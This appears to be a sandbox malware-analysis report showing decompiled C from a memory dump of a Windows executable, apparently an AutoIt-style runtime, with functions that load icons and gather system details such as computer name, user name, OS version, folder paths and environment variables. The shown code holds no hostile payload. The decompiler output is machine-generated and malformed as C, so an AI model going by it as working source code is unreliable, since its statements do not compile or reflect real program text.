                            C-Code - Quality: 100%
                            			E00AC41CD(intOrPtr _a4, int _a8, short* _a12, long _a16) {
				void* __edi;
				long _t9;
				struct HINSTANCE__* _t11;
				struct HINSTANCE__* _t12;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t14;
				char* _t24;
				short* _t25;

				_t25 = _a12;
				_t9 = 0;
				_t24 = _a16;
				 *_t24 = 0;
				_a16 = 0;
				if( *_t25 == 0) {
					L13:
					return _t9;
				} else {
					if(E00AA13CB(_t24, _t25, L"blank") != 0) {
						_t11 = E00AA13CB(_t24, _t25, L"info");
						if(_t11 == 0) {
							return LoadIconW(_t11, 0x7f04);
						}
						_t12 = E00AA13CB(_t24, _t25, L"question");
						if(_t12 != 0) {
							_t13 = E00AA13CB(_t24, _t25, L"stop");
							if(_t13 != 0) {
								_t14 = E00AA13CB(_t24, _t25, L"warning");
								if(_t14 != 0) {
									ExtractIconExW(_t25, _a8, 0,  &_a16, 1);
									_t9 = _a16;
									if(_t9 == 0) {
										goto L13;
									} else {
										 *_t24 = 1;
										return _t9;
									}
								} else {
									return LoadIconW(_t14, 0x7f03);
								}
							} else {
								return LoadIconW(_t13, 0x7f01);
							}
						} else {
							return LoadIconW(_t12, 0x7f02);
						}
					} else {
						return  *((intOrPtr*)(_a4 + 0x1b0));
					}
				}
			}











                            0x00ac41d1
                            0x00ac41d4
                            0x00ac41d7
                            0x00ac41da
                            0x00ac41dc
                            0x00ac41e2
                            0x00ac42c1
                            0x00ac42c1
                            0x00ac41e8
                            0x00ac41f8
                            0x00ac42a2
                            0x00ac42ac
                            0x00000000
                            0x00ac42b8
                            0x00ac4213
                            0x00ac421d
                            0x00ac4237
                            0x00ac4241
                            0x00ac425b
                            0x00ac4265
                            0x00ac4286
                            0x00ac428c
                            0x00ac4291
                            0x00000000
                            0x00ac4293
                            0x00ac4293
                            0x00ac4299
                            0x00ac4299
                            0x00ac4267
                            0x00ac4276
                            0x00ac4276
                            0x00ac4243
                            0x00ac4252
                            0x00ac4252
                            0x00ac421f
                            0x00ac422e
                            0x00ac422e
                            0x00ac41fe
                            0x00ac420a
                            0x00ac420a
                            0x00ac41f8

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __wcsicoll$IconLoad
                            • String ID: blank$info$question$stop$warning
                            • API String ID: 2485277191-404129466
                            • Opcode ID: 09a658985e7d12a3870959f775696cf7830875afd8b123462e50f4e3b5d71e34
                            • Instruction ID: 0e9ce1274f60ddb08dd4ae2938d6e5c68a7eb26de7d36b111473339165ab3427
                            • Opcode Fuzzy Hash: 09a658985e7d12a3870959f775696cf7830875afd8b123462e50f4e3b5d71e34
                            • Instruction Fuzzy Hash: 8321D37274020576DB019F65BD06FEA339C9F69362F004036FA04E7186E7A1A93592F9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00B02095, Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 377timeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 70%
                            			E00B02095(void* __eflags, void* __fp0, long _a4, struct HDC__* _a8, char _a12) {
				signed int _v6;
				struct _SYSTEMTIME* _v8;
				struct HWND__* _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				struct tagRECT _v52;
				signed int _v56;
				char _v68;
				char _v100;
				char _v626;
				short _v628;
				char _v644;
				char _v660;
				char _v676;
				char _v684;
				char _v700;
				char _v708;
				char _v716;
				char _v732;
				char _v740;
				char _v748;
				char _v756;
				char _v772;
				char _v780;
				short _v800;
				char _v1330;
				char _v1332;
				signed int __ebx;
				struct HWND__* __edi;
				signed int __esi;
				void* _t195;
				struct HDC__* _t215;
				signed int _t229;
				void* _t233;
				void* _t235;
				void* _t241;

				_t241 = __fp0;
				_t215 = _a8;
				_v628 = 0;
				E00AA2E60( &_v626, 0, 0x208);
				_v1332 = 0;
				E00AA2E60( &_v1330, 0, 0x208);
				_t235 = _t233 + 0x18;
				_t229 = 0;
				_v8 = _a12;
				while(1) {
					_t195 = E00AA305C( *((intOrPtr*)(0xb21770 + _t229 * 4)), _v8);
					_t235 = _t235 + 8;
					if(_t195 == 0) {
						break;
					}
					_t229 = _t229 + 1;
					if(_t229 < 0x60) {
						continue;
					}
					break;
				}
				_t239 = _t229 - 0x60;
				if(_t229 != 0x60) {
					__eflags = _t229 - 0x5f;
					if(__eflags > 0) {
						L144:
						E00A92480( &_a12);
						__eflags = 0;
						return 0;
					} else {
						switch( *((intOrPtr*)(_t229 * 4 +  &M00B02D81))) {
							case 0:
								__ecx =  *__esi;
								__edx =  *( *__esi + 4);
								__eax =  *( *__esi + 4) + __esi + 4;
								__edi =  *(E00A93EF0( *( *__esi + 4) + __esi + 4) + 0x14);
								__esi = __ebx;
								__eax = E00A99190(__edi, __ebx);
								 *__ebx = __edi;
								goto L143;
							case 1:
								__eax =  *__esi;
								__ecx =  *( *__esi + 4);
								__eax = __ecx + __esi + 4;
								E00A93EF0(__ecx + __esi + 4) = __eax + 0x20;
								__eax = E00A990D0(__ebx, __ecx, __eax);
								__ecx =  &_a12;
								E00A92480( &_a12) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 2:
								__edx =  &_v20;
								GetLocalTime(__edx);
								__eax = _v6 & 0x0000ffff;
								_push(_v6 & 0x0000ffff);
								_push(L"%.3d");
								__ecx =  &_v628;
								_push( &_v628);
								goto L16;
							case 3:
								__edx =  &_v644;
								 &_v684 = E00AD1DCB(__edx,  &_v684);
								__edi = __eax;
								__esi = __ebx;
								__eax = E00A9E8A0(__ecx, __eax, __ebx);
								__ecx =  &_v644;
								__eax = E00A92480( &_v644);
								__ecx =  &_a12;
								E00A92480( &_a12) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 4:
								_t44 =  &_v772; // 0xb1be90
								__ecx = _t44;
								_t45 =  &_v756; // 0xb1bea0
								__edx = _t45;
								__eax = E00AD1DCB(__edx, __edx);
								__edi = __eax;
								__esi = __ebx;
								__eax = E00A9E8A0(__ecx, __eax, __ebx);
								_t46 =  &_v772; // 0xb1be90
								__ecx = _t46;
								__eax = E00A92480(_t46);
								_t47 =  &_a12; // 0xb1c1a0
								__ecx = _t47;
								E00A92480(_t47) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 5:
								_t48 =  &_v732; // 0xb1bec0
								__eax = _t48;
								_t49 =  &_v708; // 0xb1bed8
								__ecx = _t49;
								__eax = E00AD1DCB(__edx, _t49);
								__edi = __eax;
								__esi = __ebx;
								__eax = E00A9E8A0(__ecx, __eax, __ebx);
								_t50 =  &_v732; // 0xb1bec0
								__ecx = _t50;
								__eax = E00A92480(_t50);
								_t51 =  &_a12; // 0xb1c1a8
								__ecx = _t51;
								E00A92480(_t51) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 6:
								_t52 =  &_v660; // 0xb1bf10
								__edx = _t52;
								_t53 =  &_v716; // 0xb1bed8
								_t53 = E00AD1DCB(__edx, _t53);
								__edi = __eax;
								__esi = __ebx;
								__eax = E00A9E8A0(__ecx, __eax, __ebx);
								_t54 =  &_v660; // 0xb1bf10
								__ecx = _t54;
								__eax = E00A92480(_t54);
								_t55 =  &_a12; // 0xb1c1b0
								__ecx = _t55;
								E00A92480(_t55) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 7:
								_t56 =  &_v676; // 0xb15e4c
								__ecx = _t56;
								_t57 =  &_v780; // 0xb15de4
								__edx = _t57;
								__eax = E00AD1DCB(__edx, __edx);
								__edi = __eax;
								__esi = __ebx;
								__eax = E00A9E8A0(__ecx, __eax, __ebx);
								_t58 =  &_v676; // 0xb15e4c
								__ecx = _t58;
								__eax = E00A92480(_t58);
								_t59 =  &_a12; // 0xb160fc
								__ecx = _t59;
								E00A92480(_t59) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 8:
								_t60 =  &_v700; // 0xb1bef0
								__eax = _t60;
								_t61 =  &_v748; // 0xb1bec0
								__ecx = _t61;
								__eax = E00AD1DCB(__edx, _t61);
								__edi = __eax;
								__esi = __ebx;
								__eax = E00A9E8A0(__ecx, __eax, __ebx);
								_t62 =  &_v700; // 0xb1bef0
								__ecx = _t62;
								__eax = E00A92480(_t62);
								_t63 =  &_a12; // 0xb1c1b8
								__ecx = _t63;
								E00A92480(_t63) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 9:
								_t64 =  &_v740; // 0xb1bed0
								__edx = _t64;
								__eax = E00AD1DCB(__edx, __edx);
								_push(__eax);
								_push(L"%d");
								_t65 =  &_v628; // 0xb1bf40
								__eax = _t65;
								_push(_t65);
								L16:
								__eax = E00AA31BB(__edx);
								goto L17;
							case 0xa:
								__ecx =  &_v68;
								__edx =  &_v28;
								__eax = E00AD1DCB(__edx, __edx);
								__edi = __eax;
								__esi = __ebx;
								__eax = E00A9E8A0(__ecx, __eax, __ebx);
								__ecx =  &_v68;
								__eax = E00A92480( &_v68);
								__ecx =  &_a12;
								E00A92480( &_a12) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 0xb:
								_t70 =  &_v628; // 0xb1bf48
								__eax = _t70;
								_push(_t70);
								_push(0);
								_push(0);
								_push(0x26);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0xc:
								_t71 =  &_v628; // 0xb1bf48
								__ecx = _t71;
								_push(__ecx);
								_push(0);
								_push(0);
								_push(0x2b);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0xd:
								_t72 =  &_v628; // 0xb1bf48
								__edx = _t72;
								_push(_t72);
								_push(0);
								_push(0);
								_push(5);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0xe:
								_t73 =  &_v628; // 0xb1bf48
								__eax = _t73;
								_push(_t73);
								_push(0);
								_push(0);
								_push(0x23);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0xf:
								_t74 =  &_v628; // 0xb1bf48
								__ecx = _t74;
								_push(__ecx);
								_push(0);
								_push(0);
								_push(0x19);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0x10:
								_t75 =  &_v628; // 0xb1bf48
								__edx = _t75;
								_push(_t75);
								_push(0);
								_push(0);
								_push(0x2e);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0x11:
								_t76 =  &_v628; // 0xb1bf48
								__eax = _t76;
								_push(_t76);
								_push(0);
								_push(0);
								_push(0x1f);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0x12:
								_t77 =  &_v628; // 0xb1bf48
								__ecx = _t77;
								_push(__ecx);
								_push(0);
								_push(0);
								_push(0x17);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0x13:
								_t78 =  &_v628; // 0xb1bf48
								__edx = _t78;
								_push(_t78);
								_push(0);
								_push(0);
								_push(0x16);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0x14:
								__eax =  &_v628;
								_push( &_v628);
								_push(0);
								_push(0);
								_push(0x18);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0x15:
								__ecx =  &_v628;
								_push(__ecx);
								_push(0);
								_push(0);
								_push(0x1a);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0x16:
								__edx =  &_v628;
								_push( &_v628);
								_push(0);
								_push(0);
								_push(0x10);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0x17:
								__eax =  &_v628;
								_push( &_v628);
								_push(0);
								_push(0);
								_push(6);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0x18:
								__ecx =  &_v628;
								_push(__ecx);
								_push(0);
								_push(0);
								_push(2);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0x19:
								__edx =  &_v628;
								_push( &_v628);
								_push(0);
								_push(0);
								_push(0xb);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0x1a:
								__eax =  &_v628;
								_push( &_v628);
								_push(0);
								_push(0);
								_push(7);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0x1b:
								__ecx =  &_a4;
								__edx =  &_v628;
								_a4 = 0x104;
								__eax = GetComputerNameW( &_v628, __ecx);
								goto L18;
							case 0x1c:
								__eax =  &_v628;
								__eax = GetWindowsDirectoryW( &_v628, 0x104);
								__eflags = __eax;
								if(__eax == 0) {
									goto L144;
								} else {
									goto L18;
								}
								goto L145;
							case 0x1d:
								__ecx =  *0xb39604;
								__eflags = __ecx[0x16];
								_push(0x104);
								__edx =  &_v628;
								_push( &_v628);
								if(__eflags == 0) {
									__eax = GetSystemDirectoryW();
								} else {
									__eax = 0;
									_v16 = 0;
									_v8 = 0;
									__eax =  &_v16;
									L00AC0D80(__eflags,  &_v16) = __eax->i();
									__ecx =  &_v16;
									__eax = L00AC0E20(__ecx);
								}
								goto L18;
							case 0x1e:
								L141:
								__esi = __ebx;
								goto L142;
							case 0x1f:
								__esi = __ebx;
								__eax = E00A99190(__edi, __ebx);
								 *__ebx = 6;
								goto L143;
							case 0x20:
								__esi = __ebx;
								__eax = E00A99190(__edi, __ebx);
								 *__ebx = 3;
								goto L143;
							case 0x21:
								__esi = __ebx;
								__eax = E00A99190(__edi, __ebx);
								 *__ebx = 9;
								goto L143;
							case 0x22:
								__esi = __ebx;
								__eax = E00A99190(__edi, __ebx);
								 *__ebx = 5;
								goto L143;
							case 0x23:
								__esi = __ebx;
								__eax = E00A99190(__edi, __ebx);
								 *__ebx = 0xa;
								goto L143;
							case 0x24:
								__esi = __ebx;
								__eax = E00A99190(__edi, __ebx);
								 *__ebx = 0x40;
								goto L143;
							case 0x25:
								__esi = __ebx;
								__eax = E00A99190(__edi, __ebx);
								 *__ebx = 0x41;
								goto L143;
							case 0x26:
								__esi = __ebx;
								__eax = E00A99190(__edi, __ebx);
								 *__ebx = 2;
								goto L143;
							case 0x27:
								__esi = __ebx;
								__eax = E00A99190(__edi, __ebx);
								 *__ebx = 7;
								goto L143;
							case 0x28:
								__esi = __ebx;
								__eax = E00A99190(__edi, __ebx);
								 *__ebx = 8;
								goto L143;
							case 0x29:
								__esi = __ebx;
								__eax = E00A99190(__edi, __ebx);
								 *__ebx = 4;
								goto L143;
							case 0x2a:
								L128:
								__esi = __ebx;
								__eax = E00A99190(__edi, __ebx);
								 *__ebx = 1;
								goto L143;
							case 0x2b:
								__esi = __ebx;
								__eax = E00A99190(__edi, __ebx);
								 *__ebx = 0x42;
								goto L143;
							case 0x2c:
								__esi = __ebx;
								__eax = E00A99190(__edi, __ebx);
								 *__ebx = 0x43;
								goto L143;
							case 0x2d:
								__eflags =  *0xb274ea - 1;
								goto L60;
							case 0x2e:
								__eflags =  *0xb38719 - 1;
								L60:
								__esi = __ebx;
								if(__eflags != 0) {
									L142:
									__eax = E00A99190(__edi, __esi);
									 *__ebx = 0;
								} else {
									__eax = E00A99190(__edi, __esi);
									 *__ebx = 1;
								}
								goto L143;
							case 0x2f:
								__eax =  *(__esi + 0xc8);
								goto L19;
							case 0x30:
								__eax =  *(__esi + 0xb8);
								goto L19;
							case 0x31:
								__eax =  *(__esi + 0xd8);
								goto L19;
							case 0x32:
								__eax =  *(__esi + 0xf4);
								__eax = E00AC4891( *(__esi + 0xf4));
								__esi = __ebx;
								__edi = __eax;
								__eax = E00A99190(__edi, __ebx);
								 *__ebx = __edi;
								goto L143;
							case 0x33:
								__ecx =  &_v628;
								__eax = GetCurrentDirectoryW(0x104, __ecx);
								goto L18;
							case 0x34:
								__eax = L"WIN32_NT";
								goto L19;
							case 0x35:
								__eax =  *0xb39604;
								__eflags =  *((char*)(__eax + 0x2a)) - 1;
								if( *((char*)(__eax + 0x2a)) != 1) {
									__eflags =  *((char*)(__eax + 0x28)) - 1;
									if( *((char*)(__eax + 0x28)) != 1) {
										__eflags =  *((char*)(__eax + 0x26)) - 1;
										if( *((char*)(__eax + 0x26)) != 1) {
											__eflags =  *((char*)(__eax + 0x24)) - 1;
											if( *((char*)(__eax + 0x24)) != 1) {
												__eflags =  *((char*)(__eax + 0x22)) - 1;
												if( *((char*)(__eax + 0x22)) != 1) {
													__eflags =  *((char*)(__eax + 0x20)) - 1;
													if( *((char*)(__eax + 0x20)) != 1) {
														__eflags =  *((char*)(__eax + 0x1e)) - 1;
														if( *((char*)(__eax + 0x1e)) != 1) {
															__eflags =  *((char*)(__eax + 0x1c)) - 1;
															if( *((char*)(__eax + 0x1c)) != 1) {
																goto L99;
															} else {
																__eax = L"WIN_2000";
															}
														} else {
															__eflags =  *((char*)(__eax + 0x30));
															__eax = L"WIN_XPe";
															if(__eflags == 0) {
																__eax = L"WIN_XP";
															}
														}
													} else {
														__eax = L"WIN_2003";
													}
												} else {
													__eax = L"WIN_VISTA";
												}
											} else {
												__eax = L"WIN_2008";
											}
										} else {
											__eax = L"WIN_7";
										}
									} else {
										__eax = L"WIN_2008R2";
									}
								} else {
									__eax = L"WIN_8";
								}
								goto L19;
							case 0x36:
								__eax =  *0xb39604;
								__edi =  *0xb39604->wHour;
								__esi = __ebx;
								__eax = E00A99190(__edi, __ebx);
								 *__ebx = __edi;
								goto L143;
							case 0x37:
								__edi =  *0xb39604;
								__edi =  &( *0xb39604->wSecond);
								__esi = __ebx;
								__eax = E00A9E8A0(__ecx,  &( *0xb39604->wSecond), __ebx);
								__ecx =  &_a12;
								E00A92480( &_a12) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 0x38:
								__esi =  &_v628;
								__edx = L"SYSTEM\\CurrentControlSet\\Control\\Nls\\Language";
								__eax = E00AA06E0(L"SYSTEM\\CurrentControlSet\\Control\\Nls\\Language",  &_v628, 0x80000002, L"InstallLanguage", 0x104);
								L17:
								__esp = __esp + 0xc;
								goto L18;
							case 0x39:
								__edx =  *0xb39604;
								__eax =  *( *0xb39604 + 0x2e) & 0x0000ffff;
								__eflags = __eax;
								if(__eax == 0) {
									__eax = L"X86";
								} else {
									__eflags = __eax - 6;
									if(__eax == 6) {
										__eax = L"IA64";
									} else {
										__eflags = __eax - 9;
										if(__eax != 9) {
											L99:
											__eax = L"UNKNOWN";
										} else {
											__eax = L"X64";
										}
									}
								}
								goto L19;
							case 0x3a:
								__ecx = 0;
								__eax = 0x80000001;
								asm("cpuid");
								__esi =  &_v68;
								 *__esi = 0x80000001;
								 *(__esi + 4) = __ebx;
								 *((intOrPtr*)(__esi + 8)) = 0;
								 *(__esi + 0xc) = __edx;
								__eflags = _v56 & 0x20000000;
								__eax = L"X64";
								if((_v56 & 0x20000000) == 0) {
									__eax = L"X86";
								}
								__ebx = _a8;
								goto L19;
							case 0x3b:
								__edx =  &_v800;
								__eax = GetKeyboardLayoutNameW( &_v800);
								__eax =  &_v800;
								goto L19;
							case 0x3c:
								 &_v1332 = E00AA1487( &_v1332, L"3, 3, 8, 1");
								__ecx =  &_v1332;
								__esi = 0;
								__edi = 0;
								__eax = E00AA10E1( &_v1332);
								__eflags = __eax;
								if(__eax > 0) {
									do {
										__eax =  *(__ebp + __edi * 2 - 0x530) & 0x0000ffff;
										__eflags = __eax - 0x20;
										if(__eax != 0x20) {
											__eflags = __eax - 0x2c;
											if(__eax != 0x2c) {
												 *((short*)(__ebp + __esi * 2 - 0x530)) = __ax;
											} else {
												__edx = 0x2e;
												 *((short*)(__ebp + __esi * 2 - 0x530)) = __dx;
											}
											__esi = __esi + 1;
											__eflags = __esi;
										}
										__eax =  &_v1332;
										__edi =  &(__edi->i);
										__eax = E00AA10E1( &_v1332);
										__eflags = __edi - __eax;
									} while (__edi < __eax);
								}
								__ecx = 0;
								 *((short*)(__ebp + __esi * 2 - 0x530)) = __cx;
								__eax =  &_v1332;
								goto L19;
							case 0x3d:
								__edx =  &_v628;
								__eax = GetModuleFileNameW(0,  &_v628, 0x104);
								goto L18;
							case 0x3e:
								 &_v100 = L00AC3478(1,  &_v100);
								__eax =  &_v100;
								goto L19;
							case 0x3f:
								__ecx =  &_v100;
								__eax = L00AC3478(2,  &_v100);
								__eax =  &_v100;
								goto L19;
							case 0x40:
								__edx =  &_v100;
								__eax = L00AC3478(3,  &_v100);
								__eax =  &_v100;
								goto L19;
							case 0x41:
								 &_v100 = L00AC3478(4,  &_v100);
								__eax =  &_v100;
								goto L19;
							case 0x42:
								E00A9E970("\r", _t215, _t217);
								E00A92480( &_a12);
								__eflags = 0;
								return 0;
								goto L145;
							case 0x43:
								"\n" = E00A9E970("\n", __ebx, __ecx);
								__ecx =  &_a12;
								E00A92480( &_a12) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 0x44:
								L"\r\n" = E00A9E970(L"\r\n", __ebx, __ecx);
								__ecx =  &_a12;
								E00A92480( &_a12) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 0x45:
								__ecx =  &_v52;
								GetDesktopWindow() = GetWindowRect(__eax,  &_v52);
								__edi = _v52.right;
								__esi = __ebx;
								__eax = E00A99190(__edi, __ebx);
								 *__ebx = __edi;
								goto L143;
							case 0x46:
								__edx =  &_v52;
								GetDesktopWindow() = GetWindowRect(__eax,  &_v52);
								__edi = _v52.bottom;
								__esi = __ebx;
								__eax = E00A99190(__edi, __ebx);
								 *__ebx = __edi;
								goto L143;
							case 0x47:
								__edi = GetDesktopWindow();
								__eax = GetDC(__edi);
								_a8 = __eax;
								__eax = GetDeviceCaps(__eax, 0xc);
								__esi = __ebx;
								_v8 = __eax;
								__eax = E00A99190(__edi, __ebx);
								__ecx = _a8;
								__eax = _v8;
								 *((intOrPtr*)(__ebx + 8)) = 1;
								 *__ebx = _v8;
								__eax = ReleaseDC(__edi, _a8);
								__ecx =  &_a12;
								E00A92480( &_a12) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 0x48:
								__edi = GetDesktopWindow();
								__eax = GetDC(__edi);
								_a8 = __eax;
								__eax = GetDeviceCaps(__eax, 0x74);
								__esi = __ebx;
								_v8 = __eax;
								E00A99190(__edi, __ebx) = _a8;
								__edx = _v8;
								 *((intOrPtr*)(__ebx + 8)) = 1;
								 *__ebx = _v8;
								__eax = ReleaseDC(__edi, _a8);
								__ecx =  &_a12;
								E00A92480( &_a12) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 0x49:
								__eax =  *0xb37f54;
								__eflags = __eax - 3;
								if(__eax == 3) {
									goto L128;
								} else {
									__eflags = __eax - 4;
									if(__eax != 4) {
										goto L141;
									} else {
										goto L128;
									}
								}
								goto L143;
							case 0x4a:
								__ecx =  &_v628;
								__eax = GetEnvironmentVariableW(L"COMSPEC", __ecx, 0x104);
								goto L18;
							case 0x4b:
								"\t" = E00A9E970("\t", __ebx, __ecx);
								__ecx =  &_a12;
								E00A92480( &_a12) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 0x4c:
								__eax =  &_a4;
								__ecx =  &_v628;
								_a4 = 0x104;
								__eax = GetUserNameW(__ecx,  &_a4);
								goto L18;
							case 0x4d:
								__edx =  &_v628;
								__eax = GetTempPathW(0x104,  &_v628);
								__esi =  &_v628;
								__eax = E00A9F390( &_v628, __eflags);
								goto L18;
							case 0x4e:
								__edx =  &_v628;
								__eax = GetEnvironmentVariableW(L"USERPROFILE",  &_v628, 0x104);
								goto L18;
							case 0x4f:
								 &_v628 = GetEnvironmentVariableW(L"HOMEDRIVE",  &_v628, 0x104);
								goto L18;
							case 0x50:
								__ecx =  &_v628;
								__eax = GetEnvironmentVariableW(L"HOMEPATH", __ecx, 0x104);
								goto L18;
							case 0x51:
								__edx =  &_v628;
								__eax = GetEnvironmentVariableW(L"HOMESHARE",  &_v628, 0x104);
								goto L18;
							case 0x52:
								 &_v628 = GetEnvironmentVariableW(L"LOGONSERVER",  &_v628, 0x104);
								goto L18;
							case 0x53:
								__ecx =  &_v628;
								__eax = GetEnvironmentVariableW(L"USERDOMAIN", __ecx, 0x104);
								goto L18;
							case 0x54:
								__edx =  &_v628;
								__eax = GetEnvironmentVariableW(L"USERDNSDOMAIN",  &_v628, 0x104);
								goto L18;
							case 0x55:
								goto L144;
							case 0x56:
								__edi =  *(__esi + 0x148);
								__esi = __ebx;
								__eax = E00A99190(__edi, __ebx);
								 *__ebx = __edi;
								L143:
								 *((intOrPtr*)(__ebx + 8)) = 1;
								goto L144;
							case 0x57:
								__eax =  *(__esi + 0x14c);
								goto L19;
							case 0x58:
								__eax = GetCurrentProcessId();
								_a8 = __eax;
								asm("fild dword [ebp+0xc]");
								__eflags = __eax;
								if(__eax < 0) {
									__fp0 = __fp0 +  *0xb1cd00;
								}
								__esi = __ebx;
								_v12 = __fp0;
								__eax = E00A99190(__edi, __ebx);
								__fp0 = _v12;
								__ecx =  &_a12;
								 *__ebx = _v12;
								 *((intOrPtr*)(__ebx + 8)) = 3;
								E00A92480( &_a12) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 0x59:
								__esi =  &_v628;
								__edx = L"Control Panel\\Appearance";
								__eax = E00AA06E0(L"Control Panel\\Appearance",  &_v628, 0x80000001, L"SchemeLangID", 0x104);
								__eax = _v628 & 0x0000ffff;
								_a4 = _v628 & 0x0000ffff;
								__eax = L00AC2E6A(__eax, 0, __esi, 4);
								L18:
								_t38 =  &_v628; // 0xb1bf40
								__eax = _t38;
								L19:
								__eax = E00A9E970(__eax, __ebx, __ecx);
								_t39 =  &_a12; // 0xb1c1c0
								__ecx = _t39;
								E00A92480(_t39) = 0;
								__eflags = 0;
								return 0;
								goto L145;
						}
					}
				} else {
					_t232 =  &_v36;
					E00A91D10("@",  &_v36, _t239);
					_a8 = 0;
					E00A9BFA0(_t232, _t241,  &_a12);
					E00A9C510(0, _t232,  &_v8,  &_a8);
					_t207 = _v8;
					if(_v8 != 0) {
						E00A990D0(_t215, 0, _t207);
						E00A92480( &_v36);
						E00A92480( &_a12);
						__eflags = 0;
						return 0;
					} else {
						E00A92480(_t232);
						E00A92480( &_a12);
						return 1;
					}
				}
				L145:
			}









































                            0x00b02095
                            0x00b0209f
                            0x00b020b6
                            0x00b020bd
                            0x00b020d4
                            0x00b020db
                            0x00b020e3
                            0x00b020e6
                            0x00b020e8
                            0x00b020f5
                            0x00b02101
                            0x00b02106
                            0x00b0210b
                            0x00000000
                            0x00000000
                            0x00b0210d
                            0x00b02111
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00b02111
                            0x00b02113
                            0x00b02116
                            0x00b0218b
                            0x00b0218e
                            0x00b02d6e
                            0x00b02d71
                            0x00b02d78
                            0x00b02d7e
                            0x00b02194
                            0x00b02194
                            0x00000000
                            0x00b0220f
                            0x00b02211
                            0x00b02214
                            0x00b0221d
                            0x00b02220
                            0x00b02222
                            0x00b02227
                            0x00000000
                            0x00000000
                            0x00b0222e
                            0x00b02230
                            0x00b02233
                            0x00b0223c
                            0x00b02240
                            0x00b02245
                            0x00b0224d
                            0x00b0224d
                            0x00b02255
                            0x00000000
                            0x00000000
                            0x00b02258
                            0x00b0225c
                            0x00b02262
                            0x00b02266
                            0x00b02267
                            0x00b0226c
                            0x00b02272
                            0x00000000
                            0x00000000
                            0x00b0229e
                            0x00b022ac
                            0x00b022b7
                            0x00b022b9
                            0x00b022bb
                            0x00b022c0
                            0x00b022c6
                            0x00b022cb
                            0x00b022d3
                            0x00b022d3
                            0x00b022db
                            0x00000000
                            0x00000000
                            0x00b022e3
                            0x00b022e3
                            0x00b022ea
                            0x00b022ea
                            0x00b022f1
                            0x00b022fc
                            0x00b022fe
                            0x00b02300
                            0x00b02305
                            0x00b02305
                            0x00b0230b
                            0x00b02310
                            0x00b02310
                            0x00b02318
                            0x00b02318
                            0x00b02320
                            0x00000000
                            0x00000000
                            0x00b02328
                            0x00b02328
                            0x00b0232f
                            0x00b0232f
                            0x00b02336
                            0x00b02341
                            0x00b02343
                            0x00b02345
                            0x00b0234a
                            0x00b0234a
                            0x00b02350
                            0x00b02355
                            0x00b02355
                            0x00b0235d
                            0x00b0235d
                            0x00b02365
                            0x00000000
                            0x00000000
                            0x00b0236d
                            0x00b0236d
                            0x00b02374
                            0x00b0237b
                            0x00b02386
                            0x00b02388
                            0x00b0238a
                            0x00b0238f
                            0x00b0238f
                            0x00b02395
                            0x00b0239a
                            0x00b0239a
                            0x00b023a2
                            0x00b023a2
                            0x00b023aa
                            0x00000000
                            0x00000000
                            0x00b023b2
                            0x00b023b2
                            0x00b023b9
                            0x00b023b9
                            0x00b023c0
                            0x00b023cb
                            0x00b023cd
                            0x00b023cf
                            0x00b023d4
                            0x00b023d4
                            0x00b023da
                            0x00b023df
                            0x00b023df
                            0x00b023e7
                            0x00b023e7
                            0x00b023ef
                            0x00000000
                            0x00000000
                            0x00b023f7
                            0x00b023f7
                            0x00b023fe
                            0x00b023fe
                            0x00b02405
                            0x00b02410
                            0x00b02412
                            0x00b02414
                            0x00b02419
                            0x00b02419
                            0x00b0241f
                            0x00b02424
                            0x00b02424
                            0x00b0242c
                            0x00b0242c
                            0x00b02434
                            0x00000000
                            0x00000000
                            0x00b02437
                            0x00b02437
                            0x00b0243e
                            0x00b02449
                            0x00b0244a
                            0x00b0244f
                            0x00b0244f
                            0x00b02455
                            0x00b02273
